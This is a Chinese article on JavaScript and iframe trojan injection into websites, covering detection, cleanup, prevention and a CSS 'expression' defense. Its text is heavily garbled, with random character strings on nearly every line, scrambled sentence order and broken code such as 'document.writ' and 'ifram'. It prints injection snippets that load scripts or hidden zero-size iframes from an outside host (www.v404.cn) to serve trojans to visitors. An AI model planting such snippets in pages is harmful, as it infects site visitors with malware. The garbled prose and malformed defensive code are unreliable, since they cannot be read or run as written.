|
网站被JS挂马解决方法 7 m; W: z( X& _- p6 Q7 {2 o3 Z: p% ^
为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范
$ |2 B, W5 n8 Y6 j3 C) \) LIFRAME 和 JS 脚本挂马。
- ]+ H$ d1 @5 T/ i) b/ Q+ m2 ~检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp, * Q6 R- A/ K, n3 e* ^* K8 k
网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、 , \8 g" z h, H3 R( Z
如何清除网页木马。如何防止网页被挂马。 1: 网页挂马的种类 . : q5 s. B& v4 Q I2 W1 K
相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的
+ I5 y' b; x( `2 N# X卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马 0 I1 X+ a, E# C5 s
利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权
" S2 A# ^% j) C3 n8 m) R。一千多位会员的 ID ) E# i9 Z! u; ^1 [: o' M7 D( d
2: 如何检测网页是否被挂马。 8 K4 Y6 f. _) g" M4 f
六款免费网页平安检测工具横向测评 ( 华军软件园 ) 1 专业检测工具。>
% N2 J5 u* @4 K H8 Q+ K ^或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全
4 j- ?- n7 `2 x因素。 2 googl 检测。> B3 e' H* [. k8 p) W
常用的杀毒软件也可以检测出来。 3 杀毒软件检测。>
! L( R/ Y9 G4 M5 e9 c; e1 ?打开你网站、博客, 4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
1 g3 g0 z* j% H2 P* f5 a9 d. H: }5 使用 McAfee SiteAdvisor 平安浏览网页的插件。
- _: K+ N+ ]+ h+ i: Z' S5 ^: |% g/ w1 T0 u) h
3: 如何清除网页木马。 - P$ f- y% l# _- m' F' m; A
就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进 2 T n$ s# d4 I! d; ]6 R, V
入源文件把相关的网页挂马种类的可疑代码删除。 2 h+ [) _, M3 n9 w* t
建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟
5 i4 q) B+ s4 N$ K `悉。>
* |; [, Y7 U7 e# \7 @ a请从预防开始吧。 4: 如何防止网页被挂马。如果你网站还没有被挂马。> 7 I$ c4 M! h, v2 O; ?
并只允许信任的人使用上传程序。 1 对网友开放上传附件功能的网站一定要进行身份认证。>
( F6 d5 Y4 p# z9 _& g2 保证你所使用的顺序及时的更新。 7 a2 J/ e5 B& C0 d2 l4 h) |
3 不要在前台网页上加注后台管理程序登陆页面的链接。 * B" t) A7 |: Y z. n
但不要把备份数据库放在顺序默认的备份目录下。 4 要时常备份数据库等重要文件。>
1 s# g* w. T6 ~不能过于简单。 5 管理员的用户名和密码要有一定复杂性。> ' l$ u& r* P. e% ]' M1 M9 K
二项功能组合, 6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。 " u' ?9 A; V8 @ h
设置执行权限选项中, 7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。
" d) }2 _8 }" L& H. X2 o: @* y9 { D8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客 ' W8 }! h5 V- w9 M3 W
5 R: J4 w" @; O1 W! h3 Q' T, n& i
IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式
6 P% D$ M* `/ Z# ^0 ]2 j" i6 a。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。 $ R# G6 d, d2 U( {! _% R
JS 挂马溯源 0 J8 h. m g: ?1 G/ e
有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方 9 }2 M+ ]2 X# A
法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。 7 ^3 r% L9 _3 N5 j0 w" h
很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS
* t5 F/ N4 ]7 u脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。 # |# F' q, l2 J0 j. ]1 k
一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示 0 S9 P- `1 }' D& H+ u- G! p- C7 v, G& @
大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而
% s/ j, q' D0 b; w5 [2 }JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。
# i7 N! F+ u6 }但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编 9 F% R* u2 M w( g6 H9 k
程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS
' x, `9 O3 Y _ _: d1 b8 y脚本在工作中会有很大的协助。 3 O+ n l% _ D$ r+ @( c+ B0 B2 P
挂马原理一点通 9 z5 ?, K o6 a8 e9 U7 R: L
可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以
; Q* i9 E, {8 t" q通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,
( v' B/ V; F9 H& f7 }, l无从区分木马在何处。 3 e( O. W9 ]% W) a: i
如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂 % a( R5 i# w- W$ \5 Z/ m0 K- P
马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很
5 S8 {: B/ d% {( J' c7 k: I8 V容易蒙混过关,导致木马久杀不绝。
& |/ m: |0 b, }, O5 R$ f' M+ kJS 挂马攻防实录 / B2 u) [, |9 ^" o' y- r; e1 j0 [
一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的 6 {' D* f N. U
挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。 6 ]4 \( Q: d) }1 S7 ]% \8 d
这种方法使用的关键代码如下: 5 l5 X5 n5 u8 L e, q4 U' o7 E0 [
"", window.open "http://www.v404.cn/ 木马 - r5 t" s: `7 J4 z( G
.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;
], t! z8 |4 m" d
+ e/ s- ~" ^2 I) A$ o: N! ]: O: D很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0 3 }/ P7 d6 N* t( e* x4 d$ ~
但是设置为 0 后,可能会出现恶意代码不运行的情况。 & q2 Z% \+ r& @& d1 a
并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “ % Y4 [; i5 a2 i/ h$ ]% g# a$ J; q
document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件 % a& [' {# w6 g# D! s; m, a* N
。 9 t `% Y6 Q2 {% Z- i
<script src="http://www.v404.cn/ 木马脚本 .js"></script> 1 y+ {3 C3 I {" Z3 E
7 s9 z5 s; G3 }
或者 ; J8 U/ U: n% t" i2 c2 p( D
document.writ "<div style='display:none'>"
4 c" z( D- K6 e% udocument.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>" 7 u( V0 X0 h! F! F& B
document.writ "</div>"
6 }+ E1 W% y, p: T0 I8 v0 w l& w
" }8 V' x7 \/ e u) ?4 h就成功地将木马挂到对方的网页中了
" X% S& n, @! T0 T; u9 |例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。 1 L% W0 q' j, h+ I& U) S
<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">
# E1 g9 I$ s5 L或者:
+ E, c6 k9 g1 m& E: t+ O<ifram src="vbscript:[ 挂马脚本 ]"> + T r& t" Z3 f9 y) c1 e
l9 ~/ ]5 o6 L. } 等等 … , S! F G( C* y" j& @
不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法 4 q9 _+ Y9 C2 e9 G1 F! v7 l9 {6 G$ Q
就是阻止 Src 请求的异地外域的 JS 脚本,代码如下: $ D; _7 z0 M# l! D0 u
iframe{mdy1:express this.src='about:blank', < iframe{mdy1:express this.src='about:blank'.this.outerHTML=''
! j4 j! o# k6 H k$ V9 R;} # {2 w8 @; u. [$ |
script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;} 1 Y; E+ X" y: y$ T
) j0 @9 v2 s5 T/ e/ i
不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。 0 p, k( ~+ Y# G8 f
这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的
8 S3 ^0 P4 z2 C4 V+ k% LCSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了
& s+ l, i! U4 @5 T# P3 k/ Z3 CWriter 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。
$ V. P1 ^& k4 G6 p5 L# V<title> 让 JS 挂马中止的 CSS 代码 </title>
9 u3 E$ X% A4 F<styl type="text/css" id="shudoo">
# M) R8 S d( {. i) O% i4 n) H/*<![CDATA[*/
& Z, Y% @7 I" x1 R" f" E6 e7 uthis.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}
: n" z/ [2 F2 c- n% k" tscript{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;} 1 r) v. ]+ Z/ H
/*]]>*/
5 a [" d8 J% b6 z8 i2 m! @</style>
|